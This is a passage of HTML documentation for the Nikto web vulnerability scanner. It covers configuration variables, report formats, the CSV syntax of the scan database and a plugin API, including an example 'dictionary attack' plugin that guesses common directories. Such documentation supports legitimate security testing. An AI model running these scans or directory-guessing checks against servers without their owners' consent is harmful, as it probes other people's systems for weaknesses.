class=\"emphasis\"><em>Deprecated</em></span></p><p>Location of nmap and the default nmap options. Nikto used\n               to use nmap to aid in checking for valid HTTP ports on any\n               targets. From Nikto 2.10, nmap is no longer used from within\n               Nikto and this variable will do nothing. This variable may be\n               removed in a later version.</p><p>Default Setting</p><pre class=\"screen\">NMAP=/usr/local/bin/nmap\nNMPOPTS=-P0</pre></dd><dt><span class=\"term\"><code class=\"varname\">SKIPPORTS</code></span></dt><dd><p><span class=\"emphasis\"><em>Deprecated</em></span></p><p>This configuration item originally defined ports that\n               would never be scanned by Nikto. This is currently unused and\n               deprecated.</p><p>Default Setting</p><pre class=\"screen\">SKIPPORTS=21 111</pre></dd><dt><span class=\"term\"><code class=\"varname\">SKIPIDS</code></span></dt><dd><div class=\"note\" style=\"margin-left: 0.5in; margin-right: 0.5in;\"><table border=\"0\" summary=\"Note\"><tr><td rowspan=\"2\" align=\"center\" valign=\"top\" width=\"25\"><img alt=\"[Note]\" src=\"note.png\"></td><th align=\"left\">Note</th></tr><tr><td align=\"left\" valign=\"top\"><p>Note, this filter only applies to tests in the\n               <code class=\"filename\">db_tests</code> database</p></td></tr></table></div><p>Contains a space separated list of Test IDs (tids) that\n               Nikto will not run on the system, for example:</p><pre class=\"screen\">SKIPIDS=000045 000345</pre><p>Default Setting</p><pre class=\"screen\">SKIPIDS=</pre></dd><dt><span class=\"term\"><code class=\"varname\">DEFAULTHTTPVER</code></span></dt><dd><p>Defines the default version of HTTP that Nikto will use,\n               unless superceded by a specific test. Usually keeping this to\n               the default will suffice, though some web servers may only work\n               with later versions of the HTTP protocol.</p><p>Default Setting</p><pre class=\"screen\">DEFAULTHTTPVER=1.0</pre></dd><dt><span class=\"term\"><code class=\"varname\">UPDATES</code></span></dt><dd><p>If the outdated Nikto plugin sees a web server it doesn't\n               know of, or a version that is later than that defined in\n               <code class=\"filename\">db_outdated</code>, then it will send this\n               information back to cirt.net for inclusion in future versions of\n               Nikto. Server specific information (e.g. IP addresses or\n               hostnames) are not sent.</p><p>This item can be set to one of the below values:</p><div class=\"blockquote\"><blockquote class=\"blockquote\"><div class=\"variablelist\"><dl><dt><span class=\"term\"><code class=\"varname\">UPDATES=yes</code></span></dt><dd><p>Display each submission and ask for permission\n                        before it is sent</p></dd><dt><span class=\"term\"><code class=\"varname\">UPDATES=no</code></span></dt><dd><p>Do not send any data back to cirt.net</p></dd><dt><span class=\"term\"><code class=\"varname\">UPDATES=auto</code></span></dt><dd><p>Send data back to cirt.net with no\n                        prompting</p></dd></dl></div></blockquote></div><p>Default Setting</p><pre class=\"screen\">UPDATES=yes</pre></dd><dt><span class=\"term\"><code class=\"varname\">MAX_WARN</code></span></dt><dd><p><span class=\"emphasis\"><em>Unused</em></span></p><p>Produces a warning of a number of MOVED responses are\n               retrieved. This is currently unused.</p><p>Default Setting</p><pre class=\"screen\">MAX_WARN=20</pre></dd><dt><span class=\"term\"><code class=\"varname\">PROMPTS</code></span></dt><dd><p><span class=\"emphasis\"><em>Deprecated</em></span></p><p>Disables Nikto prompts if set to \"no\". This is currently\n               unused and has been deprecated by the UPDATES item.</p><p>Default Setting</p><pre class=\"screen\">PROMPTS=</pre></dd><dt><span class=\"term\"><code class=\"varname\">CIRT</code></span></dt><dd><p>The IP address that Nikto will use to update the databases\n               and plugins, or will send version information back to (as\n               described in the <code class=\"varname\">UPDATES</code> item).</p><p>Default Setting</p><pre class=\"screen\">CIRT=107.170.99.251</pre></dd><dt><span class=\"term\"><code class=\"varname\">PROXYHOST</code>, </span><span class=\"term\"><code class=\"varname\">PROXYPORT</code>, </span><span class=\"term\"><code class=\"varname\">PROXYUSER</code>, </span><span class=\"term\"><code class=\"varname\">PROXYPASS</code></span></dt><dd><p>Address, port and username password of a proxy to relay all\n               requests through. Note, to use a proxy, you must set the\n               configuration items in the configuration file and supply the\n               <em class=\"parameter\"><code>-useproxy</code></em> switch to the command\n               line.</p><p>Default Setting</p><pre class=\"screen\">PROXYHOST=\nPROXYPORT=\nPROXYUSER=\nPROXYPASS=</pre></dd><dt><span class=\"term\"><code class=\"varname\">STATIC-COOKIE</code></span></dt><dd><p>Adds the supplied cookie to all requests made via Nikto,\n               this is generally useful is an authentication cookie is required\n               for a website. For example:</p><pre class=\"screen\">STATIC-COOKIE=userid=0</pre><p>Default Setting</p><pre class=\"screen\">STATIC-COOKIE=</pre></dd><dt><span class=\"term\"><code class=\"varname\">CHECKMETHODS</code></span></dt><dd><p>Nikto will attempt to identify targets as webservers by\n               sending a request to fetch the / URI via certain HTTP methods.\n               Some web servers do not implement all HTTP methods and may cause\n               Nikto to fail to identify the web server correctly if it doesn't\n               support the method being used.</p><p>If this setting is missing from the configuration file,\n               then Nikto will default back to the Nikto 2.02 default of\n               HEAD.</p><p>Default Setting</p><pre class=\"screen\">CHECKMETHODS=HEAD GET</pre></dd><dt><span class=\"term\"><code class=\"varname\">EXECDIR</code>, </span><span class=\"term\"><code class=\"varname\">PLUGINDIR</code>, </span><span class=\"term\"><code class=\"varname\">TEMPLATEDIR</code>, </span><span class=\"term\"><code class=\"varname\">DOCDIR</code></span></dt><dd><p>Defines where to find the location of Nikto, its plugins,\n               XML/HTML templates and documents. This should only normally be\n               changed if repackaging Nikto to work with different file system\n               standards. Nikto will use the EXECDIR item to guess the other\n               directories.</p><p>Default Setting</p><pre class=\"screen\">EXECDIR=.\nPLUGINDIR=EXECDIR/plugins\nTEMPLATEDIR=EXECDIR/templates\nDOCDIR=EXECDIR/docs</pre></dd></dl></div></div></div><div class=\"chapter\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\"><a name=\"reports\"></a>Chapter6.Output and Reports</h2></div></div></div><div class=\"toc\"><p><b>Table of Contents</b></p><dl><dt><span class=\"section\"><a href=\"#id288190\">Export Formats</a></span></dt><dt><span class=\"section\"><a href=\"#id288220\">HTML and XML Customisation</a></span></dt></dl></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id288190\"></a>Export Formats</h2></div></div></div><p>Nikto saved output comes in four flavours: text, CSV, XML or HTML.\n      When using <em class=\"parameter\"><code>-output</code></em>, an output format may be\n      specified with <em class=\"parameter\"><code>-Format</code></em>. Text format is assumed if\n      nothing is specified with <em class=\"parameter\"><code>-Format</code></em>. The DTD for the\n      Nikto XML format can be found in the 'docs' directory (nikto.dtd).</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id288220\"></a>HTML and XML Customisation</h2></div></div></div><p>HTML reports are generated from template files located in the\n      <code class=\"filename\">templates</code> directory. Variables are defined as\n      <code class=\"varname\">#variable-name</code>, and are replaced when the report is\n      generated. The files <code class=\"filename\">htm_start.tmpl</code> and\n      <code class=\"filename\">htm_end.tmpl</code> are included at the beginning and end\n      of the report (respectively). The <code class=\"filename\">htm_summary.tmpl</code>\n      also appears at the beginning of the report. The\n      <code class=\"filename\">htm_host_head</code> appears once for every host, and the\n      <code class=\"filename\">htm_host_item.tmpl</code> and\n      <code class=\"filename\">htm_host_im.tmpl</code> appear once for each item\n      found on a host and each \"informational message\" per host\n      (respectively).</p><p>All valid variables are used in these templates. Future versions\n      of this documentation will include a list of variables and their\n      meaning.</p><p>The copyright statements must not be removed from the\n      <code class=\"filename\">htm_end.tmpl</code> without placing them in another of the\n      templates. It is a violation of the Nikto licence to remove these\n      notices.</p></div></div><div class=\"chapter\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\"><a name=\"expanding\"></a>Chapter7.Test and Code Writing</h2></div></div></div><div class=\"toc\"><p><b>Table of Contents</b></p><dl><dt><span class=\"section\"><a href=\"#id288304\">Scan Database Field Values</a></span></dt><dt><span class=\"section\"><a href=\"#id288472\">User-Defined Tests</a></span></dt><dt><span class=\"section\"><a href=\"#id288536\">Scan Database Syntax</a></span></dt><dt><span class=\"section\"><a href=\"#id288564\">Plugins</a></span></dt><dd><dl><dt><span class=\"section\"><a href=\"#id288684\">Initialisation Phase</a></span></dt><dt><span class=\"section\"><a href=\"#id289066\">Reconnaisance Phase</a></span></dt><dt><span class=\"section\"><a href=\"#id289135\">Scan Phase</a></span></dt><dt><span class=\"section\"><a href=\"#id289174\">Reporting Phase</a></span></dt><dt><span class=\"section\"><a href=\"#id289499\">Data Structures</a></span></dt><dt><span class=\"section\"><a href=\"#id289774\">Standard Methods</a></span></dt><dt><span class=\"section\"><a href=\"#id290403\">Global Variables</a></span></dt></dl></dd><dt><span class=\"section\"><a href=\"#id290916\">Test Identifiers</a></span></dt><dt><span class=\"section\"><a href=\"#id291044\">Code Copyrights</a></span></dt></dl></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id288304\"></a>Scan Database Field Values</h2></div></div></div><p>Though some checks can be found in other plugins, the\n      <code class=\"filename\">scan_database.db</code> contains the bulk of the web test\n      information. Here is a description of the field values:</p><div class=\"table\"><a name=\"id288321\"></a><p class=\"title\"><b>Table7.1.Scan Database Fields</b></p><div class=\"table-contents\"><table summary=\"Scan Database Fields\" border=\"1\"><colgroup><col><col></colgroup><tbody><tr><td>Test ID</td><td>Nikto test ID</td></tr><tr><td>OSVDB-ID</td><td>Corresponding vulnerability entry number for\n            osvdb.org</td></tr><tr><td>Server Type</td><td>Generic server matching type</td></tr><tr><td>URI</td><td>URI to retrieve</td></tr><tr><td>HTTP Method</td><td>HTTP method to use for URI</td></tr><tr><td>Match 1</td><td>String or code to match for successful test</td></tr><tr><td>Match 1 (Or)</td><td>String or code to alternatively match for successful\n            test</td></tr><tr><td>Match1 (And)</td><td>String or code to also match for successful\n            test</td></tr><tr><td>Fail 1</td><td>String or code to match for test failure</td></tr><tr><td>Fail 2</td><td>String or code to match for test failure\n            (alternative)</td></tr><tr><td>Summary</td><td>Summary message to report for successful test</td></tr><tr><td>HTTP Data</td><td>HTTP data to be sent during POST tests</td></tr><tr><td>Headers</td><td>Additional headers to send during test</td></tr></tbody></table></div></div><br class=\"table-break\"></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id288472\"></a>User-Defined Tests</h2></div></div></div><p>Users can create their own, private tests for any of the\n      databases. By placing a syntactically correct database file in the\n      <code class=\"filename\">plugins</code> directory, with a file name prefaced with a\n      \"u\", the data will be loaded along with the built-in checks.</p><p>For example, create the file\n      <code class=\"filename\">plugins/udb_tests</code> and it will be loaded at the\n      same time <code class=\"filename\">plugins/db_tests</code> is loaded. These files\n      will also be checked for syntax when <em class=\"parameter\"><code>-dbcheck</code></em> is\n      used.</p><p>For tests which require a \"private\" OSVDB ID, use the OSVDB ID 0\n      (zero). This should be used for all vulnerabilities that do not (or\n      should not) exist in OSVDB, as ID 0 is for testing only. You are\n      encouraged to send missing information to OSVDB at\n      moderators@osvdb.org.</p><p>For the \"Test ID\", it is recommended you use unique numbers\n      between 400000 and 499999 to allow for growth of the Nikto database\n      without interfering with your own tests (note: numbers above 500000 are\n      reserved for other tests).</p><p>Please help Nikto's continued success by sending test updates to\n      <code class=\"email\">&lt;<a class=\"email\" href=\"mailto:sullo@cirt.net\">sullo@cirt.net</a>&gt;</code>.</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id288536\"></a>Scan Database Syntax</h2></div></div></div><p>The scan database is a CSV delimited file which contains most of\n      the tests. Fields are enclosed by quotes and separated by commas. The\n      field order is:</p><p>Test-ID, OSVDB-ID, Tuning Type, URI, HTTP Method, Match 1, Match 1\n      Or, Match1 And, Fail 1, Fail 2, Summary, HTTP Data, Headers</p><p>Here is an example test:</p><pre class=\"screen\">\"120\",\"3092\",\"2\",\"/manual/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web server manual\",\"\",\"\"</pre></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h2 class=\"title\" style=\"clear: both\"><a name=\"id288564\"></a>Plugins</h2></div></div></div><p>To allow a bit more flexibility, Nikto allows plugins so that there\n      is easy expansion of existing capabilities and some future\n      proofing.</p><p>Plugins are run in four different phases, these are:</p><div class=\"blockquote\"><blockquote class=\"blockquote\"><div class=\"variablelist\"><dl><dt><span class=\"term\">Initialisation (mandatory)</span></dt><dd><p>Plugin initialisation is performed before targets are\n               assigned. During this phase, the plugin should tell Nikto\n               about its existence and capabilities. It may optionally\n               set up any later required variables.</p></dd><dt><span class=\"term\">Reconnaisance (optional)</span></dt><dd><p>During the reconnaisance phase, the plugin should look\n               for interesting information that may be of use during the scan\n               phase. It may report vulnerablities, though this is\n               discouraged.</p></dd><dt><span class=\"term\">Scan (optional)</span></dt><dd><p>The scan phase should perform the meat of the plugin - this\n               is where it should look at the web server and return any\n               potential vulnerabilities.</p></dd><dt><span class=\"term\">Reporting (optional)</span></dt><dd><p>The reporting phase is used to export any found\n               vulnerabilities into a format that they can be used later, for\n               example written as a file report, or imported into a database.\n               No testing of the web server, or reporting of new vulnerbilies\n               should be performed in this phase.</p><p>This phase is slightly more complex than the others and may\n               be called at several points during Nikto's execution, as detailed\n               later</p></dd></dl></div></blockquote></div><p>Plugins are written in standard perl in the current context. They\n      should be placed within the <code class=\"varname\">PLUGINDIR</code> defined in the\n      Nikto configuration file and must have a filename ending in\n      <code class=\"filename\">.plugin</code>.</p><p>An important concept to grasp about plugins and the order that are\n      executed in is plugin weight: each phase will execute all defined\n      plugins in the order defined by the weight. A plugin's weight is defined\n      as a number between 1 and 100, where 1 is high priority and 100 is low\n      priority. Plugins of equal weight will be executed in an undefined\n      order.</p><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h3 class=\"title\"><a name=\"id288684\"></a>Initialisation Phase</h3></div></div></div><p>As described above, all plugins must be able to execute in the\n         initialisation phase or they will be ignored.</p><p>A perl sub must exist called\n         <code class=\"function\"><em class=\"replaceable\"><code>filename</code></em>_init</code>. The\n         sub is passed no parameters and should return a hash reference to a\n         hash that should contain the following entries:</p><div class=\"variablelist\"><dl><dt><span class=\"term\"><em class=\"structfield\"><code>name</code></em> (mandatory)</span></dt><dd><p>The short name of the plugin. This is used to identify\n                  the plugin during verbose logging and will, in future\n                  versions, be used to select plugin execution. The name\n                  should be one word and, ideally, lower case.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>full_name</code></em> (mandatory)</span></dt><dd><p>The full name of the plugin. This is used to identify\n                  the plugin during verbose logging and may be used in\n                  reporting modules to identify tests run against the web\n                  server.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>author</code></em> (mandatory)</span></dt><dd><p>The name or handle of the author of the plugin. This\n                  may be used during reporting to identify ownerships of\n                  copyright of tests run against the web server.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>description</code></em> (mandatory)</span></dt><dd><p>A short sentence to describe the purpose of the plugin.\n               This may be used during reporting, or by a front end to describe\n               the purpose of the plugin.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>copyright</code></em> (mandatory)</span></dt><dd><p>The copyright string (or lack of it) of the plugin. This\n                  may be used during reporting to ensure that appropriate\n                  copyright is assigned to reports.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>recon_method</code></em> (optional)</span></dt><dd><p>This should be a reference to a function used during the\n                  reconnaisance phase of the plugin's execution. If this is left\n                  undefined then the plugin will not execute during the\n                  reconnaisance phase.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>recon_cond</code></em> (optional)</span></dt><dd><p>This is an expression to be evaluated before the plugin\n                  is executed; if true, the plugins is executed, if false, the\n                  plugin is skipped. This can be used to minimise plugin\n                  execution.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>recon_weight</code></em> (optional)</span></dt><dd><p>This is the weight used to schedule the running of the\n                  plugin during the reconnaisance phase. If this is left\n                  undefined it will default to 50.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>scan_method</code></em> (optional)</span></dt><dd><p>This should be a reference to a function used during the\n                  scan phase of the plugin's execution. If this is left\n                  undefined then the plugin will not execute during the\n                  scan phase.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>scan_cond</code></em> (optional)</span></dt><dd><p>This is an expression to be evaluated before the plugin\n                  is executed; if true, the plugins is executed, if false, the\n                  plugin is skipped. This can be used to minimise plugin\n                  execution.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>scan_weight</code></em> (optional)</span></dt><dd><p>This is the weight used to schedule the running of the\n                  plugin during the scan phase. If this is left undefined it\n                  will default to 50.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>report_head</code></em> (optional)</span></dt><dd><p>This should be a reference to a function executed\n                  before any testing commences. If this is left undefined then\n                  the plugin will not be called to produce a report\n                  header.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>report_host_start</code></em>\n               (optional)</span></dt><dd><p>This should be a reference to a function executed before\n                  the reconnaisance phase of each host. If this is left\n                  undefined then the plugin will not be called to produce a host\n                  header.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>report_host_end</code></em>\n               (optional)</span></dt><dd><p>This should be a reference to a function executed after\n                  the scan phase of each host. If this is left undefined then\n                  the plugin will not be called to produce a host footer.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>report_item</code></em> (optional)</span></dt><dd><p>This should be a reference to a function executed after\n                  each found vulnerability. If this is left undefined then\n                  the plugin will not be called to produce an item\n                  record.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>report_close</code></em> (optional)</span></dt><dd><p>This should be a reference to a function executed after\n                  testing of all hosts has been finished. If this is left\n                  undefined then the plugin will not be called to close the\n                  report.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>report_format</code></em> (optional)</span></dt><dd><p>This should describe the file format that the plugin\n                  handles. This is internally matched with the contents of the\n                  <em class=\"parameter\"><code>-output</code></em> switch to reduce excessive\n                  calls to plugins.</p></dd><dt><span class=\"term\"><em class=\"structfield\"><code>report_weight</code></em> (optional)</span></dt><dd><p>This is the weight used to schedule the running of the\n                  plugin during the reporting phase. If this is left undefined\n                  it will default to 50.</p></dd></dl></div><div class=\"example\"><a name=\"id289053\"></a><p class=\"title\"><b>Example7.1.Example initialisation function</b></p><div class=\"example-contents\"><pre class=\"programlisting\"> sub nikto_dictionary_attack_init\n{\n   my $id =\n   {\n      name         =&gt; \"dictionary\",\n      full_name    =&gt; \"Dictionary attack\",\n      author       =&gt; \"Deity\",\n      description  =&gt; \"Attempts to dictionary attack commonly known directories/files\",\n      recon_method =&gt; \\&amp;nikto_dictionary_attack,\n      recon_cond   =&gt; '$CLI{mutate} =~ /6/',\n      recon_weight =&gt; 20,\n      copyright    =&gt; \"2009 Chris Sullo\"\n   };\n\n   return $id;\n}  </pre></div></div><br class=\"example-break\"></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h3 class=\"title\"><a name=\"id289066\"></a>Reconnaisance Phase</h3></div></div></div><p>The reconnaisance phase is executed for each target at the start\n         of each scan.</p><p>Each reconnaisance method such expect to take a\n         <code class=\"varname\">mark</code> hash ref. It should return nothing.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">void <b class=\"fsfunc\">recon_method</b>(</code></td><td><var class=\"pdparam\">mark</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">mark</var>;</code></td></tr></table></div><p>The reconnaisance phase is intended to be used to pull\n         information about the web server for later use by the plugin, or by\n         other plugins. Reporting vulnerabilities in this phase is\n         discouraged.</p><p>Example uses of the reconnaisance phase are to spider a site,\n         check for known applications etc.</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h3 class=\"title\"><a name=\"id289135\"></a>Scan Phase</h3></div></div></div><p>The scan phase is the meat of the plugin's life, this is run,\n         for each target, immediately after the reconnaisance phase.</p><p>Each scan should check for vulnerabilities it knows about and\n         report on them as it finds one.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">void <b class=\"fsfunc\">scan_method</b>(</code></td><td><var class=\"pdparam\">mark</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">mark</var>;</code></td></tr></table></div></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h3 class=\"title\"><a name=\"id289174\"></a>Reporting Phase</h3></div></div></div><p>This is potentially the most convoluted phase as it has several\n         hooks that may be used for each section in the scan's lifetime.</p><p>The hooks are:</p><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h4 class=\"title\"><a name=\"id289188\"></a>Report Head</h4></div></div></div><p>This hook is called immediately after target acquisition and\n            before the reconnaisance phase. It is designed to allow the\n            reporting plugin to open the report and ensure that any headers\n            are appropiately written.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">handle <b class=\"fsfunc\">report_head</b>(</code></td><td><var class=\"pdparam\">filename</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>string </code></td><td><code><var class=\"pdparam\">filename</var>;</code></td></tr></table></div><p>The <em class=\"parameter\"><code>filename</code></em> parameter is a bit of a\n            misnomer; it will be a copy of the string passed to the\n            <em class=\"parameter\"><code>-output</code></em> switch and may indicate, for\n            example, a database name.</p><p>The <em class=\"parameter\"><code>handle</code></em> is a handle that will be\n            passed to other reporting functions for this plugin so should be\n            internally consistent.</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h4 class=\"title\"><a name=\"id289251\"></a>Report Host Start</h4></div></div></div><p>This hook is called immediately before the reconnaisance\n            phase for each target. It is designed to allow the reporting plugin\n            to write any host specfic information.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">void <b class=\"fsfunc\">report_host_start</b>(</code></td><td><var class=\"pdparam\">rhandle</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">mark</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>handle </code></td><td><code><var class=\"pdparam\">rhandle</var>;</code></td></tr><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">mark</var>;</code></td></tr></table></div><p>The <em class=\"parameter\"><code>rhandle</code></em> parameter is the output\n            of the plugin's Report Head function.</p><p>The <em class=\"parameter\"><code>mark</code></em> parameter is a hashref for the\n            target information (described below).</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h4 class=\"title\"><a name=\"id289313\"></a>Report Host End</h4></div></div></div><p>This hook is called immediately after the scan phase for\n            each target. It is designed to allow the reporting plugin to close\n            any host specfic information.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">void <b class=\"fsfunc\">report_host_end</b>(</code></td><td><var class=\"pdparam\">rhandle</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">mark</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>handle </code></td><td><code><var class=\"pdparam\">rhandle</var>;</code></td></tr><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">mark</var>;</code></td></tr></table></div><p>The <em class=\"parameter\"><code>rhandle</code></em> parameter is the output\n            of the plugin's Report Head function.</p><p>The <em class=\"parameter\"><code>mark</code></em> parameter is a hashref for the\n            target information (described below).</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h4 class=\"title\"><a name=\"id289375\"></a>Report Item</h4></div></div></div><p>This hook is called once for each vulnerability found on the\n            target This should report details about the vulnerability.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">void <b class=\"fsfunc\">report_item</b>(</code></td><td><var class=\"pdparam\">rhandle</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">mark</var>, </td><td></td></tr><tr><td></td><td><var class=\"pdparam\">vulnerbility</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>handle </code></td><td><code><var class=\"pdparam\">rhandle</var>;</code></td></tr><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">mark</var>;</code></td></tr><tr><td><code>hashref </code></td><td><code><var class=\"pdparam\">vulnerbility</var>;</code></td></tr></table></div><p>The <em class=\"parameter\"><code>rhandle</code></em> parameter is the output of\n            the plugin's Report Head function.</p><p>The <em class=\"parameter\"><code>mark</code></em> parameter is a hashref for\n            the target information (described below).</p><p>The <em class=\"parameter\"><code>vulnerability</code></em> parameter is a\n            hashref for the vulnerability information (described below).</p></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h4 class=\"title\"><a name=\"id289453\"></a>Report Close</h4></div></div></div><p>This hook is called immediately after all targets have been\n            scanned. It is designed to allow the reporting plugin to elegantly\n            close the report.</p><div class=\"funcsynopsis\"><table border=\"0\" summary=\"Function synopsis\" cellspacing=\"0\" cellpadding=\"0\" style=\"padding-bottom: 1em\"><tr><td><code class=\"funcdef\">void <b class=\"fsfunc\">report_close</b>(</code></td><td><var class=\"pdparam\">rhandle</var><code>)</code>;</td><td></td></tr></table><table border=\"0\" summary=\"Function argument synopsis\" cellspacing=\"0\" cellpadding=\"0\"><tr><td><code>handle </code></td><td><code><var class=\"pdparam\">rhandle</var>;</code></td></tr></table></div><p>The <em class=\"parameter\"><code>rhandle</code></em> parameter is the output of\n            the plugin's Report Head function.</p></div></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h3 class=\"title\"><a name=\"id289499\"></a>Data Structures</h3></div></div></div><p>The below data structures are used to communicate between the\n         various plugin methods. Unless otherwise mentioned, they are all\n         standard perl hash references with the detailed members.</p><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h4 class=\"title\"><a name=\"id289511\"></a><span class=\"structname\">Mark</span></h4></div></div></div><p>The mark hash contains all information about a target. It\n            contains the below members. It should be read-only.</p><div class=\"blockquote\"><blockquote class=\"blockquote\"><div class=\"table\"><a name=\"id289525\"></a><p class=\"title\"><b>Table7.2.Members of the <span class=\"structname\">Mark</span>\n               structure</b></p><div class=\"table-contents\"><table summary=\"Members of the Mark\n               structure\" border=\"1\"><colgroup><col><col></colgroup><tbody><tr><td><em class=\"structfield\"><code>ident</code></em></td><td>\n                     Host identifier, usually equivalent to what was\n                     passed on the command line.\n                  </td></tr><tr><td><em class=\"structfield\"><code>hostname</code></em></td><td>\n                     Host name of the target.\n                  </td></tr><tr><td><em class=\"structfield\"><code>ip</code></em></td><td>\n                     IP address of the target.\n                  </td></tr><tr><td><em class=\"structfield\"><code>port</code></em></td><td>\n                     TCP port of the target.\n                  </td></tr><tr><td><em class=\"structfield\"><code>display_name</code></em></td><td>\n                     Either the hostname, or the IP address of the\n                     target, dependant on whether a hostname has been\n                     discovered.\n                  </td></tr><tr><td><em class=\"structfield\"><code>ssl</code></em></td><td>\n                     Flag to indicate whether the target runs over SSL.\n                     If it is set to 0, then the plugin should not use SSL. Any\n                     other value indicates SSL should be used.\n                  </td></tr><tr><td><em class=\"structfield\"><code>vhost</code></em></td><td>\n                     Virtual hostname to use for the target.\n                  </td></tr><tr><td><em class=\"structfield\"><code>root</code></em></td><td>\n                     Root URI to use for the target.\n                  </td></tr><tr><td><em class=\"structfield\"><code>banner</code></em></td><td>\n                     Banner of the target's web server.\n                  </td></tr></tbody></table></div></div><br class=\"table-break\"></blockquote></div></div><div class=\"section\" lang=\"en\"><div class=\"titlepage\"><div><div><h4 class=\"title\"><a name=\"id289658\"></a>Vulnerability</h4></div></div></div><p>The vulnerability hash contains all information about a\n            vulnerability. It contains the below members. It should be\n            read-only and should only be written using the\n            <code class=\"function\">add_vulnerability</code> method.</p><div class=\"blockquote\"><blockquote class=\"blockquote\"><div class=\"table\"><a name=\"id289678\"></a><p class=\"title\"><b>Table7.3.Members of the <span class=\"structname\">Vulnerability</span>\n               structure</b></p><div class=\"table-contents\"><table summary=\"Members of the Vulnerability\n               structure\" border=\"1\"><colgroup><col><col></colgroup><tbody><tr><td>mark</td><td>Hash ref to a mark data structure.</td></tr><tr><td>message</td><td>Message for the vulnerability.</td></tr><tr><td>nikto_id</td><td>Test ID (tid) of the vulnerability, this should be\n                  a unique number which'll identify the vulnerability.</td></tr><tr><td>osvdb</td><td>OSVDB reference to the vulnerability in the Open\n                  Source Vulnerability Database. This may be 0 if an OSVDB\n                  reference is not relevant or doesn't exist.</td></tr><tr><td>method</td><td>HTTP method used to find the vulnerability.</td></tr><tr><td>uri</td><td>URI for the result.</td></tr><tr><td>result</td><td>Any HTTP data, excluding headers.</td></tr></tbody></table></div></div><br class=\"table-break\"></blockquote></div></div></div><div class=\"section\" lang=\"en\"><div 